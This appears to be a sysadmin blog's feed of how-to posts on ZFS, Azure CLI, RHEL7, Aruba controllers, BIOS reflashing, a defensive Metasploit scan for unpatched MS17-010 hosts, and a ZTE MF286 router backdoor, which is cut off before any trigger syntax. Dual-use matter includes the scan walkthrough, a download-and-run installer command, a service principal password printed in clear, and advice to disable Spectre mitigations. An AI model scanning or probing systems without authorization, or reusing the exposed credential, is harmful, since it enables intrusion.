tag:blogger.com,1999:blog-65868149480896063042024-03-08T13:34:11.582+02:00DATAPUISTOKEMISTIParasta A-ryhmää, ei järjellä, ei taidolla, ei työllä, ei tuskalla vaan tuurilla!asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.comBlogger175125tag:blogger.com,1999:blog-6586814948089606304.post-89026343049045255282024-01-09T18:55:00.011+02:002024-01-09T19:01:47.562+02:00Turn single disk ZFS to mirrored ZFS<p> I wanted to add some redundancy by mirroring disk. So I did it. Notice "-s" in zpool attach command so resilvering is done sequentially.<span></span></p><a name='more'></a><p></p><p><span><span style="font-family: courier;">root@pve:~# zpool status -v<br /></span><span style="font-family: courier;"> pool: jemmapool<br /></span><span style="font-family: courier;"> state: ONLINE<br /></span><span style="font-family: courier;"> scan: scrub repaired 0B in 01:42:18 with 0 errors on Mon Jan 8 12:37:01 2024<br /></span><span style="font-family: courier;">config:<br /></span><span style="font-family: courier;"> NAME STATE READ WRITE CKSUM<br /></span><span style="font-family: courier;"> jemmapool ONLINE 0 0 0<br /></span><span style="font-family: courier;"> ata-ST8000DM004-2CX188_WSC0ZW9T ONLINE 0 0 0<br /></span><span style="font-family: courier;">errors: No known data errors<br /></span><span style="font-family: courier;"><br />root@pve:~# zpool attach -s jemmapool \<br /></span></span><span style="font-family: courier;"> /dev/disk/by-id/ata-ST8000DM004-2CX188_WSC0ZW9T \<br /></span><span style="font-family: courier;"> /dev/disk/by-id/ata-WDC_WD80EZAZ-11TDBA0_7SJS82WW<br /></span><span style="font-family: courier;"><br />root@pve:~# zpool status -v<br /></span><span style="font-family: courier;"> pool: jemmapool<br /></span><span style="font-family: courier;"> state: ONLINE<br /></span><span style="font-family: courier;">status: One or more devices is currently being resilvered. The pool will<br /></span><span style="font-family: courier;"> continue to function, possibly in a degraded state.<br /></span><span style="font-family: courier;">action: Wait for the resilver to complete.<br /></span><span style="font-family: courier;"> scan: scrub repaired 0B in 01:42:18 with 0 errors on Mon Jan 8 12:37:01 2024<br /></span><span style="font-family: courier;"> scan: resilver (mirror-0) in progress since Tue Jan 9 18:49:24 2024<br /></span><span style="font-family: courier;"> 951M / 2.85T scanned at 191M/s, 950M / 2.85T issued at 191M/s<br /></span><span style="font-family: courier;"> 822M resilvered, 0.03% done, 04:20:30 to go<br /></span><span style="font-family: courier;">config:<br /></span><span style="font-family: courier;"> NAME STATE READ WRITE CKSUM<br /></span><span style="font-family: courier;"> jemmapool ONLINE 0 0 0<br /></span><span style="font-family: courier;"> mirror-0 ONLINE 0 0 0<br /></span><span style="font-family: courier;"> ata-ST8000DM004-2CX188_WSC0ZW9T ONLINE 0 0 0<br /></span><span style="font-family: courier;"> ata-WDC_WD80EZAZ-11TDBA0_7SJS82WW ONLINE 0 0 0 (resilvering)<br /></span><span style="font-family: courier;">errors: No known data errors</span></p><p><br /></p>asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-34326507531387706572024-01-09T18:38:00.004+02:002024-01-09T19:02:50.223+02:00Fix ZFS device names<p>So you screwed up and created zpool using /dev/sdb instead of /dev/disk/by-id/ata-* as a device? Then you tried to fix it and ended up with cryptic wwn- as device name. Here's dirty solution. Make sure to run those commands right after each other. Otherwise it will get imported back with wrong device names automatically -- before you have time to do it with correct names.<span></span></p><a name='more'></a><p></p><p><span><span style="font-family: courier;">root@pve:~# zpool status -v<br /></span><span style="font-family: courier;"> pool: jemmapool<br /></span><span style="font-family: courier;"> state: ONLINE<br /></span><span style="font-family: courier;"> scan: scrub repaired 0B in 01:42:18 with 0 errors on Mon Jan 8 12:37:01 2024<br /></span><span style="font-family: courier;">config:<br /></span><span style="font-family: courier;"> NAME STATE READ WRITE CKSUM<br /></span><span style="font-family: courier;"> jemmapool ONLINE 0 0 0<br /></span><span style="font-family: courier;"> sdb ONLINE 0 0 0<br /></span><span style="font-family: courier;">errors: No known data errors<br /></span><span style="font-family: courier;"><br />root@pve:~# zpool export jemmapool && \<br /></span><span style="font-family: courier;"> mv -f /dev/disk/by-id/wwn* /dev/disk/by-id/usb* /dev/disk && \<br /></span><span style="font-family: courier;"> zpool import -d /dev/disk/by-id/ jemmapool && \<br /></span><span style="font-family: courier;"> mv -f /dev/disk/wwn* /dev/disk/usb* /dev/disk/by-id/</span></span></p><p><span><span style="font-family: courier;">root@pve:~# zpool status -v<br /></span><span style="font-family: courier;"> pool: jemmapool<br /></span><span style="font-family: courier;"> state: ONLINE<br /></span><span style="font-family: courier;"> scan: scrub repaired 0B in 01:42:18 with 0 errors on Mon Jan 8 12:37:01 2024<br /></span><span style="font-family: courier;">config:<br /></span><span style="font-family: courier;"> NAME STATE READ WRITE CKSUM<br /></span><span style="font-family: courier;"> jemmapool ONLINE 0 0 0<br /></span><span style="font-family: courier;"> ata-ST8000DM004-2CX188_WSC0ZW9T ONLINE 0 0 0<br /></span><span style="font-family: courier;">errors: No known data errors</span></span></p><div><span style="font-family: courier;"><br /></span></div>asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-68534141031475685972022-11-10T16:25:00.001+02:002024-01-09T18:57:43.702+02:00Repairing beeping Lenovo T440p<p>Laptop powers on but nothing on screen. This is often because eeprom (Winbond W25Q32FVSIQ, 32Mbit / 4MB, 2.7V - 3.6V, SPI/QPI) loses programming over time and one day laptop will simply no longer boot. At first it will blink some leds on keyboard and turns off. Then it will degrade to just beeping on boot.<span></span></p><a name='more'></a><p></p><div><div>Get CH341A programmer. Since flash is 3.3V model do not use included 1.8V adapter. Make sure you use 3.3V, not 5V - there's jumper on CH341A.</div></div><div><br /></div><div>Download drivers, tools and bios images from <a href="https://drive.google.com/drive/folders/1A-DLSZHRASffboJmlgickNsRt5YB_CAr?usp=sharing">https://drive.google.com/drive/folders/1A-DLSZHRASffboJmlgickNsRt5YB_CAr?usp=sharing</a> .</div><div><br /></div><div><div>See <a href="https://winraid.level1techs.com/t/guide-flash-bios-with-ch341a-programmer/32948">https://winraid.level1techs.com/t/guide-flash-bios-with-ch341a-programmer/32948</a> for how to connect wires and use programming tool.</div></div><div><br /></div><div><div>Remove battery and open bottom of laptop, remove RAM and connect programmer to flash chip on U49.</div><div><br /></div><div>Connect programmer to USB port on Windows PC, install drivers, launch CH341A_c.exe (v1.29) as admin. </div><div><br /></div><div>Select Type: 25\26 SPI FLASH, Manu WINBOND, Name W25Q32FV.</div><div><br /></div><div>Click Detect and ensure chip is properly found.</div><div><br /></div><div>Backup old (bad) bios just in case by reading and saving it to disk.</div><div><br /></div><div>Program chip with "Lenovo Thinkpad VILT2 NM-A131 W25Q32 U49.bin"</div><div><br /></div><div>Disconnect programmer, install RAM, close bottom, install battery, power on and flash BIOS v2.47 from Lenovo.</div><div><br /></div><div>Newer bioses contain meltdown / spectre fixes slowing PC down. Make sure you also disable meltdown / spectre mitigations on OS side - see <a href="https://make-linux-fast-again.com/">https://make-linux-fast-again.com/</a> and <a href="https://www.grc.com/inspectre.htm">https://www.grc.com/inspectre.htm</a> for details.</div><div><br /></div></div>asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-41388005999481821462020-12-03T07:09:00.002+02:002024-01-09T18:58:43.939+02:00Hiding Azure Enterprise App from users using az cli or PowerShell<p>Toggling "Visible to users" setting on portal adds / removes tag called HideApp.<span></span></p><a name='more'></a><br /><br />Hide app:<br /><span style="font-family: courier;">~$ az ad sp update --id f5f6ecff-8661-4726-a83f-8e7db8aa068f --add tags "HideApp"<br /></span><br />"Unhide" app:<br /><span style="font-family: courier;">~$ az ad sp show --id f5f6ecff-8661-4726-a83f-8e7db8aa068f --query tags<br />[<br /> "HideApp",<br /> "WindowsAzureActiveDirectoryIntegratedApp"<br />]<br /><br />~$ az ad sp update --id f5f6ecff-8661-4726-a83f-8e7db8aa068f --remove tags 0<br />[<br /> "WindowsAzureActiveDirectoryIntegratedApp"<br />]</span><br /><br />For PowerShell example see <a href="https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/hide-application-from-user-portal">https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/hide-application-from-user-portal</a> .<p></p><span></span><p><br /></p>asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-32739079074240172022020-11-12T17:08:00.005+02:002020-11-12T17:33:37.569+02:00How to get list of Azure service tags and IP ranges using az cli<p>Microsoft provides weekly updated list of IP addresses used by various Azure features as <a href="https://www.microsoft.com/en-us/download/details.aspx?id=56519" rel="nofollow" target="_blank">downloadable JSON</a> file on their webpage. Automating download of it is however not supported and prone to breakage.</p><p>Same information is now also available via Azure Service Tag Discovery API. New API is still in public preview state and list of IPs it provides is far less than downloadble file contains. So either list of IPs from API is tailored for your particular subscription or it is incomplete.<br /><br />Discovery API requires authenticated session to Azure so we need to create service principal and custom RBAC role to keep things secure. See you for more after the break.</p><span><a name='more'></a></span><p><br /></p><p># Login using your admin account<br /><b>az login<br /></b><span style="font-family: courier;"> <br />[<br /> {<br /> "cloudName": "AzureCloud",<br /> "homeTenantId": "e6e3b750-3e14-448f-af73-516e1b3b4324",<br /> "id": "739af45c-37c7-4420-b302-03c0ee7cd9e0",<br /> "isDefault": true,<br /> "managedByTenants": [],<br /> "name": "Azure Pass - Sponsorship",<br /> "state": "Enabled",<br /> "tenantId": "e6e3b750-3e14-448f-af73-516e1b3b4324",<br /> "user": {<br /> "name": "asiantuntijakaveri@root",<br /> "type": "user"<br /> }<br /> }<br />]<br /></span><br /><br /></p><p># Get SubscriptionId<br /><b>az account list --all --output table</b><br /><br /><span style="font-family: courier;">Name CloudName SubscriptionId State IsDefault<br />------------------------ ----------- ------------------------------------ ------- -----------<br />Azure Pass - Sponsorship AzureCloud 739af45c-37c7-4420-b302-03c0ee7cd9e0 Enabled True</span><br /><br /><br /></p><p># Register network provider - required if you're trying this on empty sub<br /><b>az provider register --namespace 'Microsoft.Network'</b><br /><br /><br /></p><p># Create json file that defines custom rbac role<br /><b>cat <<'__EOF__' > custom-rbac-servicetag-reader.json</b><br /><span style="font-family: courier;"><b>{</b><br /><b> "Name": "Custom: Service Tag Discovery API Reader",</b><br /><b> "IsCustom": true,</b><br /><b> "Description": "Lets you view list of service tags and their IP ranges using </b></span><span style="font-family: courier;"><b>Service Tag Discovery API</b></span><b style="font-family: courier;">.",</b></p><p><span style="font-family: courier;"><b> "Actions": [</b><br /><b> "Microsoft.Network/locations/*/serviceTags/read"</b><br /><b> ],</b><br /><b> "NotActions": [],</b><br /><b> "dataActions": [],</b><br /><b> "notDataActions": [],</b><br /><b> "AssignableScopes": [</b><br /><b> "/subscriptions/739af45c-37c7-4420-b302-03c0ee7cd9e0"</b><br /><b> ]</b><br /><b>}</b></span><br /><b>__EOF__</b><br /><br /><br /><br /># Create custom rbac on Azure<br /><b>az role definition create --role-definition custom-rbac-servicetag-reader.json</b><br /><br /><br /><br /># Verify that role was created successfully<br /><b>az role definition list --custom-role-only true --output json --query '[].{roleName:roleName, roleType:roleType}'</b></p><p><b><br /></b><span style="font-family: courier;">[<br /> {<br /> "roleName": "Custom: Service Tag Discovery API Reader",<br /> "roleType": "CustomRole"<br /> }<br />]<br /></span><br /><br /><br /># Create service principal that is only allowed to read service tag IP ranges<br /><b>az ad sp create-for-rbac -n "https://servicetagdiscoveryapi-reader" --role "Custom: Service Tag Discovery API Reader" --scopes /subscriptions/739af45c-37c7-4420-b302-03c0ee7cd9e0</b><br /><br /><span style="font-family: courier;">Creating a role assignment under the scope of "/subscriptions/739af45c-37c7-4420-b302-03c0ee7cd9e0"<br />{<br /> "appId": "26099423-d274-4b6e-9953-b523c2bf50b5",<br /> "displayName": "servicetagdiscoveryapi-reader",<br /> "name": "https://servicetagdiscoveryapi-reader",<br /> "password": "Tfgg.k5t_oyltLzN0_XkIf.gGa8.W1wSsD",<br /> "tenant": "e6e3b750-3e14-448f-af73-516e1b3b4324"<br />}</span><br /><br /><br /></p><p># Logout admin account<br /><b>az logout</b></p><p><br /></p><p># Login using service principal<br /><b>az login --service-principal -u 26099423-d274-4b6e-9953-b523c2bf50b5 -p Tfgg.k5t_oyltLzN0_XkIf.gGa8.W1wSsD --tenant e6e3b750-3e14-448f-af73-516e1b3b4324</b></p><p><span style="font-family: courier;">[<br /> {<br /> "cloudName": "AzureCloud",<br /> "homeTenantId": "e6e3b750-3e14-448f-af73-516e1b3b4324",<br /> "id": "739af45c-37c7-4420-b302-03c0ee7cd9e0",<br /> "isDefault": true,<br /> "managedByTenants": [],<br /> "name": "Azure Pass - Sponsorship",<br /> "state": "Enabled",<br /> "tenantId": "e6e3b750-3e14-448f-af73-516e1b3b4324",<br /> "user": {<br /> "name": "26099423-d274-4b6e-9953-b523c2bf50b5",<br /> "type": "servicePrincipal"<br /> }<br /> }<br />]</span><br /><br /><br /><br /># Get list of service tags and their IP ranges. <br /># Location parameter is required and must be valid, but is irrelevant as json response is same for all regions<br /><b>az network list-service-tags --location westeurope<br /></b><br /><span style="font-family: courier;">{<br /> "changeNumber": "67",<br /> "cloud": "Public",<br /> "id": "/subscriptions/</span><span style="font-family: courier;">739af45c-37c7-4420-b302-03c0ee7cd9e0</span><span style="font-family: courier;">/providers/Microsoft.Network/serviceTags/Public",<br /> "name": "Public",<br /> "type": "Microsoft.Network/serviceTags",<br /> "values": [<br /> {<br /> "id": "ActionGroup",<br /> "name": "ActionGroup",<br /> "properties": {<br /> "addressPrefixes": [<br /> "13.66.143.220/30",<br /> "13.67.10.124/30",<br /> "13.69.109.132/30",<br /> "13.71.199.112/30",<br />...</span></p><p><br />Also see: <br /><a href="https://docs.microsoft.com/en-us/azure/role-based-access-control/custom-roles-cli">https://docs.microsoft.com/en-us/azure/role-based-access-control/custom-roles-cli</a><br /><a href="https://docs.microsoft.com/en-us/azure/virtual-network/service-tags-overview">https://docs.microsoft.com/en-us/azure/virtual-network/service-tags-overview</a><br /><a href="https://lnx.azurewebsites.net/non-interactive-login-in-azure-cli-2-0/">https://lnx.azurewebsites.net/non-interactive-login-in-azure-cli-2-0/</a><br /><br /></p>asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-51210142947429162232017-06-16T02:13:00.000+03:002017-06-16T02:13:04.472+03:00RHEL7 / CentOS7 network interface going down once per hourThere's really bizarre bug in RHEL7 / CentOS7. Once per hour NetworkManager will remove IP addresses from ethernet interface after hitting some bug and triggering "link loss" action. Interface may come back by itself or may not. It does come back when you login as root on console as login triggers some repair action part via systemd...<br />
<br />
<a name='more'></a><br /><br />
This bug has been there for quite a while since oldest report of exactly same problem is from <a href="https://www.centos.org/forums/viewtopic.php?t=52690">May 2015</a> with Hyper-V. Luckily for me someone figured out bit more details of this problem in <a href="https://www.reddit.com/r/linux4noobs/comments/5s0mhq/loss_of_wired_connectivity_one_second_and_one/">February 2017</a> running KVM. I'm using ESXi so it's obviously not virtualization platform related.<br />
<br />
Edit /etc/default/grub GRUB_CMDLINE_LINUX to include "net.ifnames=0 biosdevname=0". This is required for ethernet adapter to have predicatable name (eth0) instead of randomized junk like ens224 it's by default.<br />
<br />
Tell grub to use new kernel parameters on next reboot:<br />
grub2-mkconfig -o "$(readlink -e /etc/grub2.cfg)"<br />
<br />
Fix network configuration script ifcfg-ens224 in /etc/sysconfig/network-scripts/<br />
1. Change NAME=ens224 to NAME=eth0<br />
2. Change DEVICE=ens224 to DEVICE=eth0<br />
3. Generate new unique id with "uuidgen" and replace your old uuid value on UUID= line with it.<br />
<br />
Save changes and rename ifcfg-ens224 to ifcfg-eth0.<br />
<br />
Reboot.<br />
<br />
That's it. Now systemd/NetworkDamager won't shutdown your ethernet interface once per hour.<br />
<br />
Of course there's likely bunch of other bugs and corner cases in NetworkManager that may still kill your network. Therefore it's always recommended to disable it unless you really need some of NetworkManager specific features.<br />
<br />
systemctl mask NetworkManager<br />
systemctl stop NetworkManager<br />
systemctl disable NetworkManager<br />
<br />
And reboot. Because rebooting is so much fun.<br />
<br />asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com1tag:blogger.com,1999:blog-6586814948089606304.post-6667840188659110192017-06-15T23:09:00.000+03:002017-06-15T23:13:15.709+03:00Migrating user accounts from older Linux to RHEL7 / CentOS7Another pointless change just to break backwards compatibility - RHEL7 and CentOS7 prevent users with uid lower than 1000 from logging in. This is bad when you're migrating accounts from existing Linux server where uids start at 500.<br />
<a name='more'></a><br />
Number of configuration files under /etc/pam.d enforce this limit. Editing them by hand works until next time authconfig is executed and then default setting is back.<br />
<br />
Fix this by editing /etc/login.defs and change UID_MIN and GID_MIN from default 1000 to 500.<br />
Then run "authconfig --update"<br />
<br />
Before:<br />
/etc/pam.d/password-auth:auth requisite pam_succeed_if.so uid >= 1000 quiet_success<br />
/etc/pam.d/password-auth:account sufficient pam_succeed_if.so uid < 1000 quiet<br />
<br />
After:<br />
/etc/pam.d/password-auth:auth requisite pam_succeed_if.so uid >= 500 quiet_success<br />
/etc/pam.d/password-auth:account sufficient pam_succeed_if.so uid < 500 quiet<br />
<div>
<br /></div>
<div>
<br /></div>
<div>
I used following commands to migrate user logins with passwords. Rest is easy - just rsync home directories across the network or do NFS mount.</div>
<div>
<br /></div>
<div>
<div>
awk -F: '{if ($3 >= 500 && $3 < 1000) { print } }' passwd.gramps >>/etc/passwd</div>
<div>
awk -F: '{if ($3 >= 500 && $3 < 1000) { print } }' group.gramps >>/etc/group</div>
<div>
awk -F: '{if ($3 >= 500 && $3 < 1000) { print $1 } }' passwd.gramps | egrep -f - shadow.gramps >>/etc/shadow</div>
<div>
<br /></div>
<div>
And grant sudo access by adding to my login to wheel group.</div>
<div>
<br /></div>
<div>
usermod -aG wheel asiantuntijakaveri</div>
</div>
<div>
<br /></div>
asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-33516801702798668272017-06-15T22:23:00.002+03:002017-06-15T23:46:36.334+03:00RHEL7 / CentOS7 with sshd on ports 22 and 443Short version: Not as simple as you thought.<br />
<br />
<a name='more'></a>If you've tried to run sshd on port 443 on RHEL7 / CentOS7 server with selinux enabled you're probably familiar with these errors:<br />
<br />
sshd[834]: error: Bind to port 443 on 0.0.0.0 failed: Permission denied.<br />
sshd[834]: error: Bind to port 443 on :: failed: Permission denied.<br />
ValueError: Port tcp/443 already defined<br />
ValueError: Port tcp/443 is defined in policy, cannot be deleted<br />
<br />
Solution:<br />
<br />
yum install policycoreutils-python<br />
semanage port -m -t ssh_port_t -p tcp 443<br />
<br />
firewall-cmd --permanent --zone=public --add-port=443/tcp<br />
firewall-cmd --reload<br />
<div>
</div>
<br />
echo "Port 22" >>/etc/ssh/sshd_config<br />
echo "Port 443" >>/etc/ssh/sshd_config<br />
systemctl restart sshd.service<br />
<br />
<br />asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-64517297626972257862017-05-19T12:56:00.001+03:002017-05-19T12:56:36.247+03:00Tracking wired client behind Aruba APSo you have setup with Aruba RAPs that bridge their wired ports to VLAN on controller. Web interface only tracks wireless clients so you have no idea what AP client with particular IP is connected to.<br />
<br />
<a name='more'></a>Login to controller CLI using SSH. Read-only access is enough, no need to be admin.<br />
<br />
First we need to find MAC for IP<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">(PYONGYANG-WLC-1) #show arp | include <b>10.42.235.4</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Protocol Address Hardware Address Interface</span><br />
<span style="font-family: Courier New, Courier, monospace;">Internet 10.42.235.4 <b>A4:6F:D9:E8:FF:15</b> vlan2504</span><br />
<br />
So now we know MAC, lets find tunnel it's bridged over.<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">(PYONGYANG-WLC-1) #show datapath bridge | include <b>A4:6F:D9:E8:FF:15</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Datapath Bridge Table Entries</span><br />
<span style="font-family: Courier New, Courier, monospace;">-----------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Flags: P - Permanent, D - Deny, R - Roamed Client, M - Mobile, X - Xsec, A - Auth, T - Trusted</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> MAC VLAN Assigned VLAN Destination Flags Age</span><br />
<span style="font-family: Courier New, Courier, monospace;">----------------- ---- ------------- ----------- ------- ----</span><br />
<span style="font-family: Courier New, Courier, monospace;">A4:6F:D9:E8:FF:15 2504 2504 <b>tunnel 196</b> 0</span><br />
<br />
If you're interested you can use same command to check for any other clients connected to same AP.<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">(PYONGYANG-WLC-1) #show datapath bridge | include "<b>tunnel 196</b>"</span><br />
<span style="font-family: Courier New, Courier, monospace;">A4:6F:D9:E8:FF:15 2504 2504 tunnel 196 0</span><br />
<span style="font-family: Courier New, Courier, monospace;">A4:6F:E5:15:37:08 2504 2504 tunnel 196 0</span><br />
<span style="font-family: Courier New, Courier, monospace;">A4:6F:72:53:47:3E 2504 2504 tunnel 196 0</span><br />
<div>
<br /></div>
<div>
Now that we know tunnel ID we can use it to lookup temporary AP IP</div>
<div>
<br /></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">(PYONGYANG-WLC-1) #show datapath tunnel | include <b>196</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Datapath Tunnel Table Entries</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">-----------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Flags: E - Ether encap, I - Wi-Fi encap, R - Wired tunnel, F - IP fragment OK</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> W - WEP, K - TKIP, A - AESCCM, G - AESGCM, M - no mcast src filtering</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> S - Single encrypt, U - Untagged, X - Tunneled node, 1(cert-id) - 802.1X Term-PEAP</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> 2(cert-id) - 802.1X Term-TLS, T - Trusted, L - No looping, d - Drop Bcast/Unknown Mcast,</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> D - Decrypt tunnel, a - Reduce ARP packets in the air, e - EAPOL only</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> C - Prohibit new calls, P - Permanent, m - Convert multicast</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> n - Convert RAs to unicast(VLAN Pooling/L3 Mobility enabled), s - Split tunnel</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> V - enforce user vlan(open clients only)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> H - Standby (HA-Lite), c - IP Compression, g - PAN GlobalProtect Tunnel</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"># Source Destination Prt Type MTU VLAN Acls BSSID Decaps Encaps Heartbeats Cpu QSz Flags EncapKBytes DecapKBytes</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------ -------------- -------------- --- ---- ---- ---- ----------------------- ----------------- ---------- ---------- ---------- --- --- ----- ------------- -----------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">196 192.168.8.36 <b>172.17.0.81</b> 47 8110 1200 2504 0 0 2 0 0 00:1A:1E:01:45:13 2019039 1972939 0 13 0 TEPR</span></div>
</div>
<div>
<br /></div>
<div>
Almost there - now just check what AP has that IP</div>
<div>
<br /></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">(PYONGYANG-WLC-1) #<b>show ap database | include 172.17.0.81</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Flags: U = Unprovisioned; N = Duplicate name; G = No such group; L = Unlicensed</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> I = Inactive; D = Dirty or no config; E = Regulatory Domain Mismatch</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> X = Maintenance Mode; P = PPPoE AP; B = Built-in AP; s = LACP striping</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> R = Remote AP; R- = Remote AP requires Auth; C = Cellular RAP;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> c = CERT-based RAP; 1 = 802.1x authenticated AP; 2 = Using IKE version 2</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> u = Custom-Cert RAP; S = Standby-mode AP; J = USB cert at AP</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> i = Indoor; o = Outdoor</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> M = Mesh node; Y = Mesh Recovery</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">AP Database</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">-----------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Name Group AP Type IP Address Status Flags Switch IP Standby IP</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">---- ----- ------- ---------- ------ ----- --------- ----------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PYONGYANG-RAP25</b> RAP-PYONGYANG RAP-3WN 172.17.0.81 Up 11d:5h:15m:38s Rc2 192.168.8.36 0.0.0.0</span></div>
</div>
<div>
<br /></div>
<div>
That's it. Problem client is connected to RAP25.</div>
<div>
<br /></div>
asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-22848934764397566662017-05-15T19:43:00.003+03:002017-05-15T19:59:04.539+03:00Scan Intranet for Windows PCs missing MS17-010 / WannaCry / NSA ETERNALBLUE patches<div>
So you have used all you tricks to get MS17-010 fix deployed but how to confirm that every forgotten PC on your network is actually patched?</div>
<div>
<br /></div>
<div>
We'll scan our intranet using Metasploit checking for this particular vulnerability. PCs with local firewall blocking SMB traffic will be missed, but those are not exploitable anyway due same firewall.</div>
<div>
<a name='more'></a></div>
<div>
<br /></div>
I'll keep this short.<br />
<div>
<br /></div>
<div>
- Install virtual machine with Ubuntu 16.04 Server: <b>http://releases.ubuntu.com/16.04/ubuntu-16.04.2-server-amd64.iso</b></div>
<div>
- You can use defaults during install but it's recommended to enable OpenSSH Server for remote access over LAN</div>
<div>
<br /></div>
<div>
- After install is complete login using account you created during install</div>
<div>
- Switch to root</div>
<div>
<b> sudo su -</b></div>
<div>
- Apply latest bugfixes and reboot </div>
<div>
<b> apt-get update && apt-get -y dist-upgrade && reboot</b></div>
<div>
<br /></div>
<div>
- After reboot login and switch to root</div>
<div>
<b>sudo su -</b></div>
<div>
- Install latest Metasploit nightly</div>
<div>
<b> cd /tmp</b></div>
<div>
<b> wget -O msfinstall https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb</b></div>
<div>
<b> chmod a+x msfinstall</b></div>
<div>
<div>
<b> ./msfinstall</b></div>
</div>
<div>
<br /></div>
<div>
- After install is complete launch Metasploit</div>
<div>
<b>msfconsole</b></div>
<div>
- Select module, set IP subnet to scan, number of parallel connections and GO</div>
<div>
<b> use auxiliary/scanner/smb/smb_ms17_010</b></div>
<div>
<div>
<b> set RHOSTS 10.0.0.0/24</b></div>
<div>
<b> set THREADS 30</b></div>
</div>
<div>
<b> run</b></div>
<div>
<br /></div>
<div>
And that's about it. You'll soon know how vulnerable you still are.</div>
<div>
<br /></div>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">[-] 10.0.0.54:445 - Host does NOT appear vulnerable.</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">[-] 10.0.0.10:445 - Host does NOT appear vulnerable.</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">[+] 10.0.0.92:445 - Host is likely VULNERABLE to MS17-010! (Windows Server 2008 R2 Standard 7601 Service Pack 1)</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">[-] 10.0.0.100:445 - Host does NOT appear vulnerable.</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">[-] 10.0.0.250:445 - Host does NOT appear vulnerable.</span></div>
<div>
<br /></div>
</div>
<div>
P.S. To save Metasploit output to file use command "spool /root/mylog.txt" before typing "run".<br />
<br />
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
asiantuntijakaverihttp://www.blogger.com/profile/16838888075236759392noreply@blogger.com0tag:blogger.com,1999:blog-6586814948089606304.post-84200620352837703542017-03-26T19:06:00.000+03:002017-03-26T19:17:29.266+03:00Backdoor and root shell on ZTE MF286ZTE MF286 has built-in factory backdoor allowing root shell access on embedded Linux running inside router. However since we don't know RSA-2048 private key used for encrypting device specific password we're not able to use this. Which doesn't mean we won't have other means to gain root shell.<br />
<br />
<a name='more'></a>Factory backdoor is triggered by opening specific URL. Password is device IMEI in hex but in encrypted form. This value is then decrypted using public key embedded in firmware. If result matches with device IMEI telnetd is started on port tcp/4719.<br />
<br />
Here's syntax required to trigger factory backdoor, but it's useless without that encryption key.<br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
